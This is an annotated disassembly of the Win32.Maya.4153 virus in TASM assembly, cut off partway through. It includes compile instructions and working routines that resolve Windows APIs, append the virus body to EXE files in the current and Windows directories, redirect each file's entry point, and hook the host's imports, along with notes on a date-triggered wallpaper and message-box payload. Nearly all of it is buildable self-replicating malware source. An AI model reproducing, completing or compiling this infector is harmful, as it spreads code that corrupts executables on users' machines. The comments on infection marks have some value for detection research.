;
; Win32.Maya.4153 virus
;
; disassembly done by peon
;
; Maya is a nonresident PE infector, which searches for victims in the current
; and the Windows directories. It may infect up to 10 files per round (or so).
; On the 1st of any month, infected files display a messagebox and
; set the wallpaper to 'SLAM'. Uses memory mapped files.
; On start, Maya scans the host's imports for GetModuleHandleA for its purposes,
; then looks up APIs and searches for exe's in the current and Windows
; dirs. Appends itself to the end of the exe's by enlarging the last section
; of the file. Size growth is 4153 bytes (filesize rounded up to file alignment).
; Infection mark is 'WM' in the checksum field of the DOS exe header.
; (Files that can't be infected will carry this however)
; Has minor bugs (treats exe header field 3Ch as a word (16bit) etc etc).
; Seems to contain code that is never executed (possibly incomplete)
;
;
; note: ignore the @xxxx stuff. They were important only while disassembling
; note2: you will notice that the host's entry point is hardcoded to 3000h
; if you compile with Borland stuff, that doesn't make a difference but
; otherwise you might face problems running the first generation.
;
;compilation:
;tasm32 /m /ml wm.asm
;tlink32 wm,,,import32.lib /Tpe
; ..and
;pewrsec wm.exe
; ...to avoid page faults of 1st generation
;
.386 ;i do not comment these
.model flat ;because i guess these are well-known
;and boring
;(TASM directives: 386 instruction set, 32-bit flat memory model)

extrn ExitProcess:proc ;1st generation needs this

extrn GetModuleHandleA:proc ;maya needs that the host imports
;this function
;(at start-up the virus looks this import up in the host's own import
;table; a host without it is run untouched, see maya_lookup_getmodulehandle)
;
;define two structures so need no includes
;
;WIN32_FIND_DATA as filled by FindFirstFileA/FindNextFileA; the search
;routines only ever read _fname (maya_finddata._fname).
_find_data struc ;finddata structure for file searches
_attr dd ? ;dwFileAttributes
_creatlo dd ? ;ftCreationTime (low, high)
_creathi dd ?
_lastalo dd ? ;ftLastAccessTime (low, high)
_lastahi dd ?
_lastwlo dd ? ;ftLastWriteTime (low, high)
_lastwhi dd ?
_sizehi dd ? ;nFileSizeHigh
_sizelo dd ? ;nFileSizeLow
_res0 dd ? ;dwReserved0
_res1 dd ? ;dwReserved1
_fname db 260 dup(?) ;the only important field for us (cFileName, MAX_PATH bytes)
_altname db 14 dup (?) ;cAlternateFileName (8.3 short name)
_find_data ends
;SYSTEMTIME as filled by GetSystemTime; only wday is read (maya_payload).
win32systime struc ;system time structure for payload checking
wyear dw ? ;wYear
wmonth dw ? ;wMonth
wdow dw ? ;wDayOfWeek
wday dw ? ;we are interested in checking the day (wDay: payload triggers when it is 1)
whour dw ? ;wHour
wmin dw ? ;wMinute
wsec dw ? ;wSecond
wmillisec dw ? ;wMilliseconds
win32systime ends
.code
;------------------- viral code begins here -----------------------

;Everything from maya_start up to maya_end (defined after the data, not in
;this excerpt) is copied into each victim; this is the 4153-byte body.
maya_length equ maya_end-maya_start ;size of viral code
maya_start equ $
;
;calculate delta offset and get a handle to KERNEL32.dll
;
;Viral entry point: control arrives here from the infected host's patched
;AddressOfEntryPoint (set in maya_infect). Register roles:
; ebp = delta offset (runtime address - assembly-time offset); every
;       variable is addressed as [ebp+offset name] and ebp is saved
;       around every call that may disturb it
; ebx = host imagebase, later ptr to the 'KERNEL32.dll' string
; edi = cursor over the api name table
;Leaves through maya_restart_host, which jumps to the host's own entry.
maya:
push ebp ;store ebp on stack (popped again in maya_restart_host)
call maya_flexible_entry;flexible entry point
maya_flexible_entry:
pop ebp ;will calculate delta offset: ebp = runtime address of this label
mov ebx,ebp ;keep the runtime address for the imagebase calculation
sub ebp,offset maya_flexible_entry ;ebp = delta offset
mov eax,1000h ;RVA of viral section,hardcoded
maya_rva_of_viral_section equ $-4 ;the immediate above is overwritten with the victim's section RVA during infection (maya_infect)
add eax,6 ;push (1 byte) + call (5 bytes): the label sits 6 bytes past the section start
sub ebx,eax ;got imagebase
mov [ebp+offset maya_imagebase],ebx ;store imagebase
mov edx,offset maya_getmodulehandlea
add edx,ebp ;fetch ptr to 'GetModuleHandleA' string
mov ecx,[ebp+offset maya_getmodulehandlea_len] ;fetch string length
push ebp ;save delta
call maya_lookup_getmodulehandle ;search for import in host
pop ebp ;get delta bk
cmp eax,-1 ;failed?
jz maya_restart_host ;yes,abort: a host that does not import GetModuleHandleA runs untouched
mov [ebp+offset maya_getmodulehandlea_add],eax ;store address
push ebp ;push delta
mov ebx,offset maya_k32 ;fetch ptr to 'KERNEL32.dll' string
add ebx,ebp ;add delta
push ebx ;store parameter
call eax ;call GetModuleHandleA('KERNEL32.dll')
pop ebp ;get delta bk
mov [ebp+offset maya_addof_k32],eax ;store add off K32 (module base used by maya_get_apis)
;
;look up api's
;
;Walks the name table that starts at maya_getmodulehandlea_len. Each entry is
;dd length (incl. NUL), db name, dd slot that receives the resolved address;
;a length field equal to 'MAYA' terminates the table.
mov edi,offset maya_getmodulehandlea_len ;add of length of 1st string
add edi,ebp ;plus delta offset
maya_lookup_loop:
mov ecx,[edi] ;get string length
cmp ecx,'MAYA' ;end of api names?
jz maya_lookup_done ;yes
add edi,4 ;skip length of string
mov edx,edi ;store ptr (edx = name, ecx = length: the inputs of maya_get_apis)
add edi,ecx ;edi points to where we want result
push edi
call maya_get_apis ;look up api
pop edi
mov [edi],eax ;store add (stored as-is, so a -1 failure value lands in the slot too)
add edi,4 ;go to add of next
jmp maya_lookup_loop ;and branch
maya_lookup_done:
mov dword ptr [ebp+offset maya_infection_counter],0 ;kill counter
;
;search for executables and infect them
;
;Infection runs on every start of an infected host and before the date
;check of the payload.
call maya_process_current_directory
call maya_process_windows_directory
;
;lookup a few more apis--possibly incomplete
;
call maya_lookup_more
;
;payload check
;
call maya_payload
;
;jump to host
;
maya_restart_host:
mov eax,[ebp+offset maya_entry_of_host] ;get host entry rva (stored per victim by maya_infect)
add eax,[ebp+offset maya_imagebase] ;add imagebase
pop ebp ;restore ebp
push eax ;save return address
ret ;and jump to host
;
;get api addresses needed for infection
;
;Resolves one export by name from the module whose base is in
;maya_addof_k32, walking its export directory.
; In:  edx = ptr to NUL-terminated name, ecx = its length incl. NUL
; Out: eax = address of the export, or -1 if the MZ/PE signatures are wrong
; Uses: esi, edi, ebx, ecx; fills maya_eat, maya_expnames, maya_eord
maya_get_apis:
mov esi,[ebp+offset maya_addof_k32] ;get add of K32
cmp word ptr [esi],'ZM' ;is it an exe? ('MZ' signature)
jne maya_get_apis_return_failure;nope,abort
xor eax,eax ;zero register
mov ax,[esi+3ch] ;ptr to PE header (e_lfanew, only its low word is read)
add eax,[ebp+offset maya_addof_k32];plus K32 base
xchg esi,eax ;into esi
cmp word ptr [esi],'EP' ;is it a PE? ('PE' signature)
jne maya_get_apis_return_failure;nope,abort
mov esi,[esi+78h] ;get exports rva in K32 (export data directory)
add esi,[ebp+offset maya_addof_k32];plus K32 base
mov eax,[esi+1ch] ;AddressOfFunctions rva
add eax,[ebp+offset maya_addof_k32]
mov [ebp+offset maya_eat],eax ;store it
mov eax,[esi+20h] ;ptrs to exported names (AddressOfNames)
add eax,[ebp+offset maya_addof_k32]
mov [ebp+offset maya_expnames],eax ;store it
mov eax,[esi+24h] ;ptrs to export ordinals (AddressOfNameOrdinals)
add eax,[ebp+offset maya_addof_k32]
mov [ebp+offset maya_eord],eax ;store it
xor eax,eax ;zero register: eax = byte index into the name pointer array (4*n)
;The scan has no upper bound (NumberOfNames is never read); it continues
;until a name compares equal.
maya_get_apis_loop:
push ecx ;save string length
mov esi,edx ;esi=ptr to name that is searched for
mov edi,[ebp+offset maya_expnames];ptr to exported names
add edi,eax
mov edi,[edi] ;fetch ptr to exported function name
add edi,[ebp+offset maya_addof_k32] ;add K32 base
repe ;compare names
cmpsb
cmp ecx,0 ;perfect match?
je maya_get_apis_found ;yes
add eax,4 ;nope,proceed with next
pop ecx ;get string length back
jmp maya_get_apis_loop ;and compare with next name in K32
maya_get_apis_found:
pop ecx ;remove ecx from stack
shr eax,1 ;halve eax: 4*n -> 2*n, index into the word ordinal array
add eax,[ebp+offset maya_eord] ;fix ptr to eord's
xor ebx,ebx ;zero ebx
mov bx,[eax] ;fetch eord
shl ebx,2 ;*4: index into the dword array of function rvas
add ebx,[ebp+offset maya_eat] ;add exports add table offset
mov eax,[ebx] ;get rva of function
add eax,[ebp+offset maya_addof_k32];add base of K32
ret ;and return to caller
maya_get_apis_return_failure:
mov eax,-1 ;return failure to caller
ret
;
;searches the host's imports for GetModuleHandleA
;
;Walks the host's import directory (base = maya_imagebase) to the first
;descriptor whose DLL name starts with "KERN", then scans that module's
;import name table for the requested function. Also called from
;maya_lookup_more with other names.
; In:  edx = ptr to NUL-terminated name, ecx = its length incl. NUL
; Out: eax = value read from the matching IAT slot (the imported address)
;      ebx = address of that IAT slot
;      eax = -1 on failure
maya_lookup_getmodulehandle:
mov esi,[ebp+offset maya_imagebase] ;get imagebase
cmp word ptr [esi],'ZM' ;host file must be exe
jne maya_lookup_getmodulehandle_return_failure ;but it isnt so abort
xor eax,eax ;zero reg
mov ax,[esi+3ch] ;ptr to PE head (e_lfanew, low word only)
mov esi,eax ;into esi
add esi,[ebp+offset maya_imagebase] ;add imagebase
cmp word ptr [esi],'EP' ;is it a PE?
jne maya_lookup_getmodulehandle_return_failure ;nope,abort
mov esi,[esi+80h] ;get imports rva (import data directory)
add esi,[ebp+offset maya_imagebase] ;add imagebase
mov eax,esi ;eax = current import descriptor (14h bytes each)
;No null-descriptor check: the walk relies on a KERN* module being imported.
maya_lookup_getmodulehandle_dll_loop:
mov esi,eax
mov esi,[esi+0ch] ;name rva of dll module
add esi,[ebp+offset maya_imagebase] ;add imagebase
cmp [esi],'NREK' ;is module name 'KERN...'? (little-endian dword compare of the first 4 chars)
je maya_lookup_getmodulehandle_dll_ok ;yes
add eax,14h ;next entry
jmp maya_lookup_getmodulehandle_dll_loop;check next
maya_lookup_getmodulehandle_dll_ok:
mov esi,eax
mov eax,[esi+10h] ;import lookup table rva (descriptor +10h is FirstThunk, i.e. the IAT)
add eax,[ebp+offset maya_imagebase] ;add imagebase
mov [ebp+offset maya_ilt],eax ;store ilt rva
cmp dword ptr [esi],0 ;OriginalFirstThunk present?
je maya_lookup_getmodulehandle_return_failure
mov esi,[esi] ;import name table rva
add esi,[ebp+offset maya_imagebase] ;add imagebase
mov ebx,esi ;store ptr
xor eax,eax ;zero reg: eax = thunk index
maya_lookup_getmodulehandle_function_loop:
cmp dword ptr [ebx],0 ;end of the thunk array?
je maya_lookup_getmodulehandle_return_failure
cmp byte ptr [ebx+3],80h ;import by ordinal (high byte of the thunk equal to 80h)?
je maya_lookup_getmodulehandle_nextfunction ;yes,skip it
mov esi,[ebx]
add esi,[ebp+offset maya_imagebase]
add esi,2 ;skip the hint word: esi = imported function name
mov edi,edx
push ecx
repe
cmpsb ;compare function names
cmp ecx,0 ;match?
pop ecx
je maya_lookup_getmodulehandle_done ;yes
maya_lookup_getmodulehandle_nextfunction:
inc eax
add ebx,4
jmp maya_lookup_getmodulehandle_function_loop
maya_lookup_getmodulehandle_done:
shl eax,2 ;*4
add eax,[ebp+offset maya_ilt] ;eax = matching IAT slot
mov ebx,eax ;slot address goes back to the caller in ebx (used by maya_lookup_more)
mov eax,[eax] ;got the add
ret ;so return to the caller
maya_lookup_getmodulehandle_return_failure:
mov eax,-1 ;show that we failed
ret ;and return to the caller
;
;file infection subroutine
;
;Infects one PE file by appending the virus body to its last section.
; In:  edx = ptr to ASCIIZ filename (kept on the stack until the attributes
;            are restored at maya_infect_restore_attr)
; Out: maya_successfull_infection = 1 only if the body was written
;Observable effects on a victim (useful for detection):
; - DOS header checksum field (offset 12h) set to 'WM'; it is written before
;   the PE checks, so files that fail the later tests still carry the mark
; - every section header gets IMAGE_SCN_MEM_WRITE (80000000h)
; - last section grows by maya_length plus alignment padding and is flagged
;   code+execute; its VirtualSize is set equal to SizeOfRawData
; - AddressOfEntryPoint moved into the appended code; SizeOfImage updated
; - file attributes forced to normal (80h) for the duration, then restored
maya_infect: ;@11F3
mov dword ptr[ebp+offset maya_successfull_infection],0 ;kill flag
call maya_getfileattrs ;get file attr
mov [ebp+offset maya_fileattrib],eax ;store it
push edx ;ptr to filename
mov eax,80h ;normal attr (clears read-only etc. so the file can be opened for writing)
call maya_setfileattrs
pop edx
push edx ;filename stays on the stack for maya_infect_restore_attr
call maya_openfile ;open file
cmp eax,-1 ;failed?
je maya_infect_restore_attr ;yes,abort
mov [ebp+offset maya_handle],eax ;store handle
call maya_getfsize
cmp eax,-1 ;failed?
je maya_infect_closefile ;yes,abort
cmp dword ptr [ebp+offset maya_filesize_high_dword],0 ;file smaller
; than 4 GB?
jne maya_infect_closefile ;nope abort
xchg ecx,eax
mov [ebp+offset maya_filesize],ecx ;store filesize
mov eax,[ebp+offset maya_handle] ;get handle
mov ecx,[ebp+offset maya_filesize] ;get filesize
add ecx,maya_length+1000h ;add virus size+1000h (mapping is larger than the final file; SetEndOfFile trims it later)
call maya_createfmap ;create file mapping
cmp eax,0 ;failed?
je maya_infect_closemap ;yes,abort
mov [ebp+offset maya_maphandle],eax ;store handle
mov ecx,[ebp+offset maya_filesize] ;get size of victim
add ecx,maya_length+1000h
call maya_mapview ;MapViewOfFile()
cmp eax,0 ;failed?
je maya_infect_closemap ;yes,abort
mov [ebp+offset maya_mappedadd],eax ;store ptr
mov esi,eax ;and load into esi
cmp word ptr [esi],'ZM' ;EXE?
jne maya_infect_unmap
cmp word ptr [esi+12h],'MW' ;WM in the checksum
je maya_infect_unmap ;field?(already inf'd)
mov word ptr [esi+12h],'MW' ;mark infected (infection marker 'WM' at e_csum, written through the writable mapping)
xor eax,eax
mov ax,[esi+3ch] ;ptr to PE header (e_lfanew, low word only)
cmp ax,0 ;no PE header?
je maya_infect_unmap
cmp eax,maya_filesize ;header located
;*** ;beyond eof?
;bug:should be cmp eax,[ebp+maya_filesize] for proper operation
;***
jnc maya_infect_unmap ;yes abort
add eax,[ebp+offset maya_mappedadd] ;get add of mapped
mov esi,eax ;PE header
cmp word ptr [esi],'EP' ;PE?
jne maya_infect_unmap ;nope abort
mov [ebp+offset maya_peptr],eax ;store ptr to PE head
mov eax,[esi+3ch] ;get filealign (FileAlignment)
mov [ebp+offset maya_filealign],eax ;store it
mov eax,[ebp+offset maya_entry_of_host] ;get current host entry
mov [ebp+offset maya_olderva],eax ;store it (put back after the copy so the running instance keeps its own host entry)
mov eax,[esi+28h] ;get victim entry rva (AddressOfEntryPoint)
mov [ebp+offset maya_entry_of_host],eax ;store it: the copy written below carries the victim's original entry
mov eax,[esi+74h] ;NumberOfRvaAndSizes
shl eax,3 ;*8: size of the data directory
add eax,[ebp+offset maya_peptr]
add eax,78h ;eax = first section header
xor ecx,ecx ;zero register
mov cx,[esi+6] ;get object count (NumberOfSections)
maya_infect_setwbit: ;@1318
or dword ptr [eax+24h],80000000h ;set W bit of sections (IMAGE_SCN_MEM_WRITE on every section)
add eax,28h ;next section...
loop maya_infect_setwbit
sub eax,28h ;ptr to last entry
mov [ebp+offset maya_ptrtolastsection],eax ;store it
mov edi,eax ;ptr into edi
mov eax,[edi+10h] ;get section PhysSize (SizeOfRawData)
mov [ebp+offset maya_sectps],eax ;store it
add eax,[edi+0ch] ;plus section rva (VirtualAddress): rva where the virus body will start
mov [ebp+offset maya_rva_of_viral_section],eax ;patch code (the immediate at maya_rva_of_viral_section in the running body, before it is copied)
mov [ebp+offset maya_sectrva],eax ;store it
push edi
mov eax,[edi+14h] ;get section PhysOffs (PointerToRawData)
add eax,[ebp+offset maya_mappedadd] ;get ptr to raw
;data of last section
add eax,[edi+10h] ;add PhysSize
mov edi,eax ;load ptr into edi
mov esi,offset maya_start ;get virus start add
add esi,ebp ;add delta offset
mov ecx,maya_length ;length of code
cld ;increase pointers
rep ;move viral code..
movsb ;..into the mapped..
pop edi ;..executable
add dword ptr [edi+10h],maya_length ;update..
;..sectionPhysSize
add dword ptr [ebp+offset maya_filesize],maya_length ;and filesize
xor edx,edx ;zero edx
mov eax,[edi+10h] ;get section PhysSize
mov ecx,[ebp+offset maya_filealign]
push ecx ;calculates section..
div ecx ;..PhysSize with respect
pop ecx ;to file alignment unit
sub ecx,edx ;calculate padding (filealign - remainder)
add [edi+10h],ecx ;and add to PhysSize
add [ebp+offset maya_filesize],ecx
mov eax,[edi+10h] ;get updated PhysSize
mov [edi+8],eax ;set virtual size
or dword ptr [edi+24h],20h ;set Code flag (IMAGE_SCN_CNT_CODE)
or dword ptr [edi+24h],20000000h ;set Executable flag (IMAGE_SCN_MEM_EXECUTE)
mov esi,[ebp+offset maya_peptr] ;get ptr to PE head
mov eax,[ebp+offset maya_sectrva] ;get rva of last section
mov [esi+28h],eax ;set new entry point
mov eax,[edi+0ch] ;get section rva
add eax,[edi+10h] ;add section PhysSize
mov [esi+50h],eax ;set imagesize (SizeOfImage)
mov eax,[ebp+offset maya_olderva] ;get current host entry
mov [ebp+offset maya_entry_of_host],eax ;restore it
mov dword ptr[ebp+offset maya_successfull_infection],1
;set flag
maya_infect_unmap: ;@13D0
mov eax,[ebp+offset maya_mappedadd]
call maya_unmapview ;call UnmapViewOfFile
maya_infect_closemap: ;@13DB
mov eax,[ebp+offset maya_maphandle] ;call CloseHandle
call maya_closefile
mov eax,[ebp+offset maya_handle]
mov ecx,[ebp+offset maya_filesize]
call maya_setfilepo ;set file pointer to end (the updated size, or the original one when nothing was appended)
cmp eax,-1
je maya_infect_closefile
mov eax,[ebp+offset maya_handle]
call maya_seteof ;and set end of file: trims the oversized mapping back to maya_filesize
maya_infect_closefile:
mov eax,[ebp+offset maya_handle]
call maya_closefile ;finally close file
maya_infect_restore_attr:
pop edx ;ptr to filename
mov eax,[ebp+offset maya_fileattrib]
call maya_setfileattrs ;restore attributes
ret ;and return to caller
;
;subroutines used during infection
;
;Each wrapper below pushes its stdcall arguments, calls the API through the
;address resolved into the matching maya_*_add slot, and keeps ebp (the
;delta offset) safe across the call.
;
;CreateFileA(edx, GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ, 0,
;            OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0)
; In: edx = filename   Out: eax = handle, or -1 (INVALID_HANDLE_VALUE)
maya_openfile: ;@141F
push ebp ;keep delta across the call
push 0 ;hTemplateFile
push 80h ;dwFlagsAndAttributes = FILE_ATTRIBUTE_NORMAL
push 3 ;dwCreationDisposition = OPEN_EXISTING
push 0 ;lpSecurityAttributes
push 1 ;dwShareMode = FILE_SHARE_READ
push 0C0000000h ;dwDesiredAccess = GENERIC_READ|GENERIC_WRITE
push edx ;lpFileName
mov eax,[ebp+offset maya_createfilea_add]
call eax
pop ebp
ret
;CloseHandle(eax); used for the file handle and for the mapping handle.
maya_closefile: ;@143D
push ebp ;keep delta across the call
push eax ;hObject
mov eax,[ebp+offset maya_closehandle_add]
call eax
pop ebp
ret
;CreateFileMappingA(eax, 0, PAGE_READWRITE, 0, ecx, 0)
; In: eax = file handle, ecx = mapping size (low dword)
; Out: eax = mapping handle, or 0 on failure
maya_createfmap: ;@1449
push ebp ;keep delta across the call
push 0 ;lpName
push ecx ;dwMaximumSizeLow
push 0 ;dwMaximumSizeHigh
push 4 ;flProtect = PAGE_READWRITE (the header edits are written back to disk)
push 0 ;lpAttributes
push eax ;hFile
mov eax,[ebp+offset maya_createfilemappinga_add]
call eax
pop ebp
ret
;MapViewOfFile(eax, FILE_MAP_WRITE, 0, 0, ecx)
; In: eax = mapping handle, ecx = bytes to map
; Out: eax = view address, or 0 on failure
maya_mapview: ;@145E
push ebp ;keep delta across the call
push ecx ;dwNumberOfBytesToMap
push 0 ;dwFileOffsetLow
push 0 ;dwFileOffsetHigh
push 2 ;dwDesiredAccess = FILE_MAP_WRITE
push eax ;hFileMappingObject
mov eax,[ebp+offset maya_mapviewoffile_add]
call eax
pop ebp
ret
;UnmapViewOfFile(eax)
; In: eax = view address
maya_unmapview: ;@1471
push ebp ;keep delta across the call
push eax ;lpBaseAddress
mov eax,[ebp+offset maya_unmapviewoffile_add]
call eax
pop ebp
ret
;SetFilePointer(eax, ecx, 0, FILE_BEGIN)
; In: eax = file handle, ecx = absolute offset   Out: eax = new position, or -1
maya_setfilepo: ;@147D
push ebp ;keep delta across the call
push 0 ;dwMoveMethod = FILE_BEGIN
push 0 ;lpDistanceToMoveHigh
push ecx ;lDistanceToMove
push eax ;hFile
mov eax,[ebp+offset maya_setfilepointer_add]
call eax
pop ebp
ret
;SetEndOfFile(eax): truncates/extends the file at the current file pointer.
; In: eax = file handle
maya_seteof: ;@148E
push ebp ;keep delta across the call
push eax ;hFile
mov eax,[ebp+offset maya_setendoffile_add]
call eax
pop ebp
ret
;GetFileSize(eax, &maya_filesize_high_dword)
; In: eax = file handle
; Out: eax = low dword of the size (-1 on failure); high dword stored in
;      maya_filesize_high_dword. Clobbers ebx.
maya_getfsize: ;@149A
push ebp ;keep delta across the call
mov ebx,offset maya_filesize_high_dword ;get add of room for
add ebx,ebp ;hi dword of filesize
push ebx ;store ptr (lpFileSizeHigh)
push eax ;store handle
mov eax,[ebp+offset maya_getfilesize_add];get fn add
call eax ;call fn
pop ebp
ret
;GetFileAttributesA(edx)
; In: edx = filename (preserved: pushed once as a save, once as the argument)
; Out: eax = attributes
maya_getfileattrs: ;@14AE
push ebp ;keep delta across the call
push edx ;save filename ptr
push edx ;store filename as param
mov eax,[ebp+offset maya_getfileattributesa_add]
call eax ;call function
pop edx ;filename ptr back
pop ebp
ret
;SetFileAttributesA(edx, eax)
; In: edx = filename, eax = attributes to set
maya_setfileattrs: ;@14BC
push ebp ;keep delta across the call
push eax ;store params (dwFileAttributes)
push edx ;lpFileName
mov eax,[ebp+offset maya_setfileattributesa_add]
call eax ;call fn
pop ebp
ret
;GetCurrentDirectoryA(80h, eax)
; In: eax = ptr to a 128-byte buffer   Out: eax = length, or 0 on failure
maya_getcurrdir: ;@14C9
push ebp ;keep delta across the call
push eax ;ptr to buffer (lpBuffer)
push 80h ;buffer size (nBufferLength)
mov eax,[ebp+offset maya_getcurrentdirectorya_add]
call eax
pop ebp
ret
;SetCurrentDirectoryA(eax)
; In: eax = ptr to ASCIIZ path   Out: eax = nonzero on success
maya_setcurrdir: ;@14DA
push ebp ;keep delta across the call
push eax ;ptr to path (lpPathName)
mov eax,[ebp+offset maya_setcurrentdirectorya_add]
call eax
pop ebp
ret
;GetWindowsDirectoryA(eax, 80h)
; In: eax = ptr to a 128-byte buffer   Out: eax = length, or 0 on failure
maya_getwindir: ;@14E6
push ebp ;keep delta across the call
push 80h ;buffer size (uSize)
push eax ;ptr to buffer (lpBuffer)
mov eax,[ebp+offset maya_getwindowsdirectorya_add]
call eax
pop ebp
ret
;GetSystemTime(&maya_systime): fills the win32systime structure used by the
;payload's date check.
maya_getsystime: ;@14F7
push ebp ;keep delta across the call
mov eax,offset maya_systime
add eax,ebp
push eax ;store ptr to structure to be filled (lpSystemTime)
mov eax,[ebp+offset maya_getsystemtime_add]
call eax ;call fn
pop ebp
ret
;GetModuleHandleA(eax), through the address found in the host's import table
; In: eax = ptr to module name   Out: eax = module handle, or 0
maya_getmodhand: ;@150A
push ebp ;keep delta across the call
push eax ;lpModuleName
mov eax,[ebp+offset maya_getmodulehandlea_add]
call eax
pop ebp
ret
;GetProcAddress(eax, edx)
; In: eax = module handle, edx = ptr to function name   Out: eax = address, or 0
maya_getprocadd: ;@1516
push ebp ;keep delta across the call
push edx ;ptr to fn name (lpProcName)
push eax ;hModule
mov eax,[ebp+offset maya_getprocaddress_add]
call eax
pop ebp
ret
;
;lookup of further api names in the host's import table
;
;Resolves a second name table (starting at maya_movefilea_len, terminated by
;a length field equal to 'SHAI'; the table itself is not in this excerpt)
;via maya_lookup_getmodulehandle. From the +4/+8 arithmetic each entry
;appears to be: dd length, db name, dd slot for the original address,
;dd offset of a replacement routine. On a hit the original import address
;is saved in the slot and the host's IAT entry (ebx from the lookup) is
;overwritten with delta+replacement, i.e. the import is redirected into the
;virus body (presumably the maya_deadcode_callN stubs below). The
;disassembler's note says this does not work in practice.
maya_lookup_more: ;@1523
mov edi,offset maya_movefilea_len ;ptr to more api names
add edi,ebp ;plus delta offset
maya_lookup_more_loop: ;loop begins here
mov ecx,[edi] ;get length of name string
cmp ecx,'SHAI' ;end of api names?
je maya_lookup_more_return ;yes
add edi,4 ;skip length of string
mov edx,edi ;edx points to api name
push edi ;save regs
push ecx
push ebp
call maya_lookup_getmodulehandle ;get fn add (and the IAT slot address in ebx)
;this call will fail or virus causes a fault at line 579
;(line number as in the author's own listing, not this page)
pop ebp ;get regs back
pop ecx
pop edi
add edi,ecx ;get ptr to room for address,after api name
cmp eax,-1
je maya_lookup_more_nextfn ;not imported by the host: skip this entry
mov [edi],eax ;store fn add (original import address)
mov eax,[edi+4] ;offset of the replacement routine (presumably)
add eax,ebp ;relocate it with the delta
mov [ebx],eax ;write it into the host's IAT slot
maya_lookup_more_nextfn:
add edi,8 ;next
jmp maya_lookup_more_loop
maya_lookup_more_return: ;@1559
ret
;
;the following code is probably dead
;
;Hook body reached from the maya_deadcode_callN stubs through
;maya_deadcode_hook (which sets ecx=4). After pushad the stack holds the 8
;registers (20h bytes), the return into the hook, the return into the stub
;and the host's return address, so [esp+ecx+28h] = [esp+2Ch] is the first
;argument of the intercepted call (apparently a filename). If it ends in
;.EXE/.exe the file is infected. All registers are preserved.
maya_deadcode:
pushad
call maya_deadcode_calculate_deltaoffset ;ebp = delta offset
add ecx,28h
mov edx,[esp+ecx] ;edx = first argument of the hooked call
call maya_deadcode_extension_check
cmp eax,1
jne maya_deadcode_skip
call maya_infect
maya_deadcode_skip:
popad
ret
;Checks whether the first '.' in an ASCIIZ name is followed by "EXE" or
;"exe" (only these two spellings; only the first dot is examined).
; In: edx = ptr to filename   Out: eax = 1 if it matches, else 0
; Clobbers: esi, al, DF cleared
maya_deadcode_extension_check:
mov esi,edx ;get filename ptr into esi
cld ;increase ptrs
maya_deadcode_extension_check_loop:
lodsb ;fetch character of filename
cmp al,0 ;null?
je maya_deadcode_extension_check_ret0 ;yes abort
cmp al,'.' ;dot?
jne maya_deadcode_extension_check_loop ;nope branch to find dot
cmp dword ptr [esi-1],'EXE.';extension check (esi-1 points at the dot: ".EXE")
je maya_deadcode_extension_check_ret1
cmp dword ptr [esi-1],'exe.';extension check (".exe")
je maya_deadcode_extension_check_ret1
maya_deadcode_extension_check_ret0:
xor eax,eax ;return failure
ret
maya_deadcode_extension_check_ret1:
mov eax,1 ;return success
ret
;@159x
;
;these calls dont seem to be executed
;
;Hook trampolines. Each stub first runs the infection hook (maya_deadcode
;via maya_deadcode_hook, which returns with ecx = delta offset) and then
;tail-jumps through its maya_*_add slot, i.e. into the address that
;maya_lookup_more saved there for the original import. The stub offsets
;(maya_deadcode_callN) are presumably what maya_lookup_more plants into the
;host's IAT.
maya_deadcode_call1 equ $
call maya_deadcode_hook
jmp [ecx+offset maya_movefilea_add] ;continue into the saved original import
maya_deadcode_call2 equ $
call maya_deadcode_hook
jmp [ecx+offset maya_copyfilea_add]
maya_deadcode_call3 equ $
call maya_deadcode_hook
jmp [ecx+offset maya_createfilea2_add]
maya_deadcode_call4 equ $
call maya_deadcode_hook
jmp [ecx+offset maya_deletefilea_add]
maya_deadcode_call5 equ $
call maya_deadcode_hook
jmp [ecx+offset maya_setfileattributesa2_add]
maya_deadcode_call6 equ $
call maya_deadcode_hook
jmp [ecx+offset maya_getfileattributesa2_add]
maya_deadcode_call7 equ $
call maya_deadcode_hook
jmp [ecx+offset maya_getfullpathnamea_add]
maya_deadcode_call8 equ $
call maya_deadcode_hook
jmp [ecx+offset maya_createprocessa_add]
;Common part of the stubs: runs maya_deadcode with ecx=4 (the stack depth it
;expects), then returns with ecx = delta offset so the stub can address its
;maya_*_add slot. ebp is preserved.
maya_deadcode_hook:
mov ecx,4
call maya_deadcode
push ebp
call maya_deadcode_calculate_deltaoffset ;ebp = delta offset
mov ecx,ebp ;hand the delta back in ecx
pop ebp
ret
;Self-contained delta calculation for the hook path: ebp = runtime address
;of maya_deadcode_calculate_deltaoffset_plus5 minus its assembly-time offset.
maya_deadcode_calculate_deltaoffset:
call $+5 ;pushes the address of the next instruction
maya_deadcode_calculate_deltaoffset_plus5:
pop ebp
sub ebp,offset maya_deadcode_calculate_deltaoffset_plus5
ret
;
;file searching routines
;
;Second infection pass. Resets the counter and re-scans the current
;directory; if that did not reach 5 infections, remembers the current
;directory (maya_currdir), switches to the Windows directory (maya_windir),
;scans it and switches back. Any failing directory API ends the pass early.
maya_process_windows_directory:
mov dword ptr[ebp+offset maya_infection_counter],0 ;kill counter
call maya_process_current_directory ;attack current dir again
cmp dword ptr[ebp+offset maya_infection_counter],5 ;inf'd 5 files again?
je maya_process_windows_directory_return ;if so return
mov eax,offset maya_currdir
add eax,ebp
call maya_getcurrdir ;GetCurrentDirectoryA into maya_currdir
cmp eax,0
je maya_process_windows_directory_return ;failed: stay where we are
mov eax,offset maya_windir
add eax,ebp
call maya_getwindir ;GetWindowsDirectoryA into maya_windir
cmp eax,0
je maya_process_windows_directory_return
mov eax,offset maya_windir
add eax,ebp
call maya_setcurrdir ;SetCurrentDirectoryA(maya_windir)
cmp eax,0
je maya_process_windows_directory_return
call maya_process_current_directory ;scan the Windows directory (the counter continues from the first scan)
mov eax,offset maya_currdir
add eax,ebp
call maya_setcurrdir ;back to the saved directory (result not checked)
maya_process_windows_directory_return:
ret ;return to caller
;
;routine to scan for and infect files in the current directory
;
;Enumerates '*.EXE' (maya_filemask) with FindFirstFileA/FindNextFileA into
;maya_finddata and hands every name to maya_infect. Returns when the
;enumeration ends or as soon as maya_infection_counter reaches 5.
;Uses: eax, edx; stores maya_findhandle.
maya_process_current_directory: ;@1674
push ebp ;keep delta across the API call
mov eax,offset maya_finddata ;get add of structure
add eax,ebp ;add delta offset
push eax ;store parameter (lpFindFileData)
mov eax,offset maya_filemask ;get add of filemask
add eax,ebp ;add delta offset
